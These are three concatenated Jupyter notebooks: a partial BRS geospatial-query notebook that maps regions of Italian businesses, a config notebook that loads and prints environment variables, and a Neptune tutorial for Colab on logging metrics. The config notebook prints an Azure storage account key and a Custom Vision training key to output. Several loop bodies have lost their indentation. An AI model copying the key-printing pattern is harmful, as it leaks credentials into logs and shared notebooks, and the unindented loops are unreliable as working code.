# Change the algorithm to one of unif, single, multi, or hybrid. The fastest is hybrid; unif uses a uniform grid. The default is hybrid.
algo="hybrid"
data={'algo':algo}
response = requests.get(ChangeAlgo_URL,params=data)
print(response.text)
# ## Remove previous results
# BRS buffers previous results to avoid repeating the same query. The following call removes the buffered results.
response = requests.get(Flush_URL)
print(response.text)
# ## Change memory size
# Set the amount of RAM for the Spark instance, in GB. The default is 10 GB.
memorySize=11
data={'memorySize':memorySize}
response = requests.get(ChangeMemorySize_URL,params=data)
print(response.text)
# ## Identify industrial districts
# An example of a BRS query. The table must include columns lat and lon, which are coordinates. The f parameter indicates the column name (revenue, numberOfEmployees, etc.) used by the scoring function. Keywords are used to filter the records; you can filter on two columns at the same time. Separate keywords with commas. For example, to filter companies with an ATECO code of 10.10 or 10.11, set keywordsColumn to "ATECO" and keywords to "10.10,10.11". Moreover, in the same query, to additionally keep only companies of a specific province (e.g., Pisa), set keywordsColumn2 to "province" and keywords2 to "pisa".
#
# This query detects the top 10 regions sized 10km*10km that contain the largest number (f is null) of startup companies (filtering the column flags with startup-registroimprese). The second filter column (keywordsColumn2) is left empty.
#
# CAUTION: You can run this query with a pre-fetched table (BRSflags, which has been injected into the docker image) in order to check the REST API and results.
# +
table = "BRSflags" # This table already exists in the docker image
topk = 10 #
eps = .1 # Side length of each region; coordinates are in degrees, and 1 degree is roughly 100km, so eps = .1 gives ~10km*10km regions
f = "null" # Set f to null if the scoring function is the number of elements
dist = True
keywordsColumn = "flags"
keywords = "startup-registroimprese"
keywordsColumn2 = ""
keywords2 = ""
data = {'topk' : topk, 'eps' : eps, 'f' : f, 'input' : table, "keywordsColumn" : keywordsColumn, "keywords" : keywords,"keywordsColumn2":keywordsColumn2,"keywords2":keywords2,"dist":dist}
response = requests.get(BRS_URL, params=data)
print(response.text)
# -
# ## Initialize the map and visualize the output regions
# This code helps you visualize the output of the previous cell
res = json.loads(response.text)
results_geojson={"type":"FeatureCollection","features":[]}
for region in res:
results_geojson['features'].append({"type": "Feature", "geometry": { "type": "Point", "coordinates": region['center']},
"properties": {
"id": region['rank'],
"score": region['score']
}})
m = folium.Map(
location=[45.474989560000004,9.205786594999998],
tiles='Stamen Toner',
zoom_start=11
)
gdf = GeoDataFrame.from_features(results_geojson['features'])
gdf.crs = {'init': 'epsg:4326'}
gdf['geometry'] = gdf.buffer(data['eps']).envelope
threshold_scale = Natural_Breaks(gdf[value_field], k=num_bins).bins.tolist()
threshold_scale.insert(0, gdf[value_field].min())
choropleth = folium.Choropleth(gdf, data=gdf, columns=[id_field, value_field],
key_on='feature.properties.{}'.format(id_field),
fill_color=fill_color, fill_opacity=fill_opacity,
threshold_scale=threshold_scale).add_to(m)
fields = list(gdf.columns.values)
fields.remove('geometry')
tooltip = folium.features.GeoJsonTooltip(fields=fields)
choropleth.geojson.add_child(tooltip)
m
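The response-to-GeoJSON loop above is repeated verbatim for each query in this notebook; it can be factored into a small helper (a sketch using the same field names as the BRS response):

```python
def regions_to_geojson(regions):
    """Turn a list of BRS region records into a GeoJSON FeatureCollection."""
    return {
        "type": "FeatureCollection",
        "features": [
            {
                "type": "Feature",
                "geometry": {"type": "Point", "coordinates": r["center"]},
                "properties": {"id": r["rank"], "score": r["score"]},
            }
            for r in regions
        ],
    }
```

Each visualization cell could then start with `results_geojson = regions_to_geojson(json.loads(response.text))`.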
# ## ---------------------------------------------------------------------------------------------------------
# ## Identify industrial districts
# Find the top 20 regions sized 50km*50km that contain the highest number of employees (f is numberOfEmployees) working in the production of pasta.
topk=20
eps=0.5
keywordsColumn="ATECO"
keywords="10.73"
f="numberOfEmployees"
dist = True
table = "BRS"
keywordsColumn2 = ""
keywords2 = ""
data = {'topk' : topk, 'eps' : eps, 'f' : f, 'input' : table, "keywordsColumn" : keywordsColumn, "keywords" : keywords,"keywordsColumn2":keywordsColumn2,"keywords2":keywords2,"dist":dist}
response = requests.get(BRS_URL, params=data)
print(response.text)
# ## Initialize the map and visualize the output regions
res = json.loads(response.text)
results_geojson={"type":"FeatureCollection","features":[]}
for region in res:
results_geojson['features'].append({"type": "Feature", "geometry": { "type": "Point", "coordinates": region['center']},
"properties": {
"id": region['rank'],
"score": region['score']
}})
m = folium.Map(
location=[44.629635,10.563514999999999],
tiles='Stamen Toner',
zoom_start=11
)
gdf = GeoDataFrame.from_features(results_geojson['features'])
gdf.crs = {'init': 'epsg:4326'}
gdf['geometry'] = gdf.buffer(data['eps']/2).envelope
threshold_scale = Natural_Breaks(gdf[value_field], k=num_bins).bins.tolist()
threshold_scale.insert(0, gdf[value_field].min())
choropleth = folium.Choropleth(gdf, data=gdf, columns=[id_field, value_field],
key_on='feature.properties.{}'.format(id_field),
fill_color=fill_color, fill_opacity=fill_opacity,
                       threshold_scale=threshold_scale).add_to(m)
fields = list(gdf.columns.values)
fields.remove('geometry')
tooltip = folium.features.GeoJsonTooltip(fields=fields)
choropleth.geojson.add_child(tooltip)
m
# ## ---------------------------------------------------------------------------------------------------------
# ## Identify areas with a high concentration of restaurants or hotels
# This is an example of applying a filter on two columns at the same time: it identifies the top 10 hotspots in the Pisa province (see keywordsColumn) by the number (f is null) of restaurants, ice-cream parlours, pastry shops, etc. (see keywordsColumn2).
table = "BRS"
topk = 10
eps = 0.01
f = "null"
dist = True
keywordsColumn = "null"
keywords = "null"
keywordsColumn2 = ""
keywords2 = ""
data = {'topk' : topk, 'eps' : eps, 'f' : f, 'input' : table, "keywordsColumn" : keywordsColumn, "keywords" : keywords,"keywordsColumn2":keywordsColumn2,"keywords2":keywords2,"dist":dist}
response = requests.get(BRS_URL, params=data)
print(response.text[:-22])
# ## Initialize the map and visualize the output regions
res = json.loads(response.text[:-22])
results_geojson={"type":"FeatureCollection","features":[]}
for region in res:
results_geojson['features'].append({"type": "Feature", "geometry": { "type": "Point", "coordinates": region['center']},
"properties": {
"id": region['rank'],
"score": region['score']
}})
m = folium.Map(
location=[43.71682982000001,10.401120675000001],
tiles='Stamen Toner',
zoom_start=11
)
gdf = GeoDataFrame.from_features(results_geojson['features'])
gdf.crs = {'init': 'epsg:4326'}
gdf['geometry'] = gdf.buffer(data['eps']/2).envelope
threshold_scale = Natural_Breaks(gdf[value_field], k=num_bins).bins.tolist()
threshold_scale.insert(0, gdf[value_field].min())
choropleth = folium.Choropleth(gdf, data=gdf, columns=[id_field, value_field],
key_on='feature.properties.{}'.format(id_field),
fill_color=fill_color, fill_opacity=fill_opacity,
threshold_scale=threshold_scale).add_to(m)
fields = list(gdf.columns.values)
fields.remove('geometry')
tooltip = folium.features.GeoJsonTooltip(fields=fields)
choropleth.geojson.add_child(tooltip)
m
# ## Remove Tables
# The following call removes the intermediate tables downloaded from Proteus.
response = requests.get(RemoveTables_URL)
print(response.text)
|
BRS_Folium.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import io, os
from dotenv import load_dotenv
from pathlib import Path
env_path = Path(os.getcwd()).parent / '.env'
print(env_path)
load_dotenv(dotenv_path=env_path, verbose=True)
# %run AzureStorage.ipynb
# +
healthy_habitat_ai_storage_account_name=os.getenv('HEALTHY_HABITAT_AI_STORAGE_ACCOUNT_NAME')
print(healthy_habitat_ai_storage_account_name)
healthy_habitat_ai_storage_account_key=os.getenv('HEALTHY_HABITAT_AI_STORAGE_ACCOUNT_KEY')
print(healthy_habitat_ai_storage_account_key)
healthy_habitat_ai_processed_table_name = 'processed'
print(healthy_habitat_ai_processed_table_name)
custom_vision_training_key=os.getenv('CUSTOM_VISION_TRAINING_KEY')
print(custom_vision_training_key)
custom_vision_para_grass_project_id=os.getenv('CUSTOM_VISION_PARA_GRASS_PROJECT_ID')
print(custom_vision_para_grass_project_id)
custom_vision_magpie_geese_project_id=os.getenv('CUSTOM_VISION_MAGPIE_GEESE_PROJECT_ID')
print(custom_vision_magpie_geese_project_id)
# -
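Since `os.getenv` silently returns `None` for unset variables (and the prints above would then just show `None`), a small guard can fail fast instead (a sketch; it would be used with the variable names above):

```python
import os

def require_env(name):
    """Return the value of an environment variable, failing fast if it is unset."""
    value = os.getenv(name)
    if value is None:
        raise EnvironmentError(f"Missing required environment variable: {name}")
    return value
```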
|
notebooks/Common.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] id="GG3_2HyRVY4Y" tags=["header", "comment"]
# # Introduction
# + [markdown] id="3wSDx9alU7Zx" tags=["comment"]
# This guide will show you how to:
#
# * Install ```neptune-client```,
# * Connect Neptune to your Colab notebook and create the first run,
# * Log simple metrics to Neptune and explore them in the UI.
# + [markdown] id="FUaDrmRu-h3k"
# # Before you start
#
# Make sure that:
# * you have an account with both [Google](https://support.google.com/accounts/answer/27441?hl=en) and [Neptune](https://neptune.ai/register)
# * you have [created a project](https://app.gitbook.com/@neptune-ai/s/docs-re-positioning/administration/workspace-project-and-user-management/projects#create-project) from the Neptune UI that you will use for tracking metadata.
#
# **Tip:**<br>
# Registering with Neptune and creating a project are optional if you are just trying out the application as an 'ANONYMOUS' user.
# + [markdown] id="0NQaVXuoWA-E" tags=["header", "installation"]
# # Install ```neptune-client``` and import `neptune`
# + id="wmpN4W8wQ7MI" tags=["installation"]
# ! pip install neptune-client
# + id="quJ_tJDk7R3e"
import neptune.new as neptune
# + [markdown] id="7LFLtV5R5JKT" tags=["header"]
# # Initialize Neptune
# + [markdown] id="xoD3U3V_HUzy" tags=["comment"]
# Connect your script to Neptune and create a new run.
# + [markdown] id="xrjGGLs6HUzy" tags=["comment"]
# Basically, you tell Neptune:
#
# * **who you are**: your Neptune `api_token`
# * **where you want to send your data**: your Neptune `project`.
#
# At this point, you will have a new run in Neptune. From now on you will use `run` to log metadata to it.
# + [markdown] id="wEb6l4x8ZYlN" tags=["header", "exclude"]
# ## Get your personal ```api_token``` to initialize Neptune
# + [markdown] id="abBT8VERkz6d"
# **Note:**<br>
# There are a few special, public projects to show how Neptune works. For those projects, you can use the 'ANONYMOUS' api token and log as a public user `neptuner`.
#
# For example:
# ```python
# run = neptune.init(api_token='<PASSWORD>',
# project='common/neptune-and-google-colab')
# ```
# + [markdown] id="YXeWd99OHUz2" tags=["comment", "exclude"]
# Get your [Neptune API token](https://docs.neptune.ai/getting-started/installation#authentication) and pass it to Neptune:
# 
#
# The preferred way of doing this is by using the ```getpass()``` method so that your token remains private even if you share the notebook.
# + id="FXPlKmjC10MG" tags=["code", "exclude"]
from getpass import getpass
api_token = getpass("Enter your private Neptune API token: ")
# -
# You can log as an anonymous user `neptuner` with `api_token='<PASSWORD>'`
# + [markdown] id="TQZAqPw5apot" tags=["header", "exclude"]
# ## Initialize your project
#
# Remember to [create a new project](https://docs.neptune.ai/administration/workspace-project-and-user-management/projects#create-project) from the UI that you will use for metadata tracking.
# + id="4k_jZnnFwwW8" tags=["code", "exclude"]
workspace = "your_neptune_username"
project_name = "neptune-and-google-colab"
project = workspace + "/" + project_name
# if you are using ANONYMOUS api token, log to the project= 'common/neptune-and-google-colab'
# project = 'common/neptune-and-google-colab'
print(project)
# + [markdown] id="iGmC-Ybultmr"
# **Tip:** The `project_name` of a project can be found under its Settings → Properties
# 
# + id="Y_fHH8I7ls5H"
run = neptune.init(project=project, api_token=api_token)
# + [markdown] id="VnSWXRbXHUz3" tags=["comment", "exclude"]
# Click on the link above to open this run in Neptune. For now it is empty, but keep the tab with the run open to see what happens next.
# + [markdown] id="rhVnTl3THUz4" tags=["comment"]
# Runs can be viewed as dictionary-like structures - **namespaces** - that you can define in your code. You can apply a hierarchical structure to your metadata that will be reflected in the UI as well. Thanks to this you can easily organize your metadata in a way you feel is most convenient.
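The slash-separated field paths map onto a nested structure, which can be illustrated without Neptune at all (purely illustrative; this is not Neptune's implementation):

```python
def assign(tree, path, value):
    """Set a value in a nested dict using a slash-separated path."""
    *parents, leaf = path.split("/")
    for key in parents:
        tree = tree.setdefault(key, {})
    tree[leaf] = value

run_like = {}
assign(run_like, "parameters/learning_rate", 0.1)
assign(run_like, "train/loss", 0.97)
assign(run_like, "sys/name", "colab-example")
# run_like is now {"parameters": {"learning_rate": 0.1},
#                  "train": {"loss": 0.97}, "sys": {"name": "colab-example"}}
```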
# + [markdown] id="pk4ZgmW9Q7Mg" tags=["header"]
# # Log metadata during training
# + [markdown] id="0uyhflfLQ7Mg" tags=["comment"]
# Log metrics or losses under a name of your choice. You can log one or multiple values.
#
# Now run the cell below, and switch over to the Neptune UI to view the live logging.
# + id="jZdLObUSQ7Mi" tags=["code"]
from time import sleep
params = {"learning_rate": 0.1}
# log params
run["parameters"] = params
# log name and append tags
run["sys/name"] = "colab-example"
run["sys/tags"].add(["colab", "simple"])
# log loss during training
for epoch in range(132):
sleep(0.1) # to see logging live
run["train/loss"].log(0.97 ** epoch)
run["train/loss-pow-2"].log((0.97 ** epoch) ** 2)
# log train and validation scores
run["train/accuracy"] = 0.95
run["valid/accuracy"] = 0.93
# log files/artifacts
# ! echo "Welcome to Neptune" > file.txt
run["artifacts/sample"].upload("file.txt") # file will be uploaded as sample.txt
# -
# The snippet above logs:
#
# * `parameters` with just one field: learning rate,
# * name of run and two tags,
# * `train/loss` and `train/loss-pow-2` as series of numbers, visualized as charts in UI,
# * `train/accuracy` and `valid/accuracy` as single values
# * `file.txt` which will be visible under All Metadata/artifacts as sample.txt
# **Tip:**<br>
# To view the structure of a run, use the `print_structure()` method.
# + pycharm={"name": "#%%\n"}
run.print_structure()
# + [markdown] id="XSHLD6AkI7LW"
# # Stop logging
# <font color=red>**Warning:**</font><br>
# Once you are done logging, you should stop tracking the run using the `stop()` method.
# This is needed only when logging from a notebook environment. When logging from a script, Neptune automatically stops tracking once the script finishes.
# + id="Zgh3NwDoJAuG"
run.stop()
# + [markdown] id="mRhOAcS0Q7Mm" tags=["comment"]
# # Explore the run in the Neptune UI
#
# 
#
# Go to the `All metadata` and `Charts` sections of the Neptune UI to see them. You can also check an [example run](https://app.neptune.ai/o/common/org/showroom/e/SHOW-37/charts)
#
# 
#
# **Tip:**
#
# Neptune automatically logs the hardware consumption during the run.
#
# You can see it in the `Monitoring` section of the Neptune UI.
#
# 
# + [markdown] id="had9MNRtQ7Mr" tags=["comment"]
# # Conclusion
#
# You’ve learned how to:
# * Install `neptune-client`,
# * Connect Neptune to your Google Colab notebook and create a run,
# * Log metadata to Neptune,
# * See your metrics, parameters, and scores,
# * See hardware consumption during the run.
# + [markdown] id="_3ibcYhPQ7Mr" tags=["comment"]
# # What's next
#
# Now that you know how to create runs and log metrics, you can learn:
#
# * [How to log other types of metadata to Neptune](https://docs.neptune.ai/you-should-know/logging-and-managing-runs-results/logging-runs-data#what-objects-can-you-log-to-neptune)
# * [How to download runs data from Neptune](https://docs.neptune.ai/user-guides/logging-and-managing-runs-results/downloading-runs-data)
# * [How to connect Neptune to the ML framework you are using](https://docs.neptune.ai/essentials/integrations)
|
integrations-and-supported-tools/colab/Neptune_Colab.ipynb
|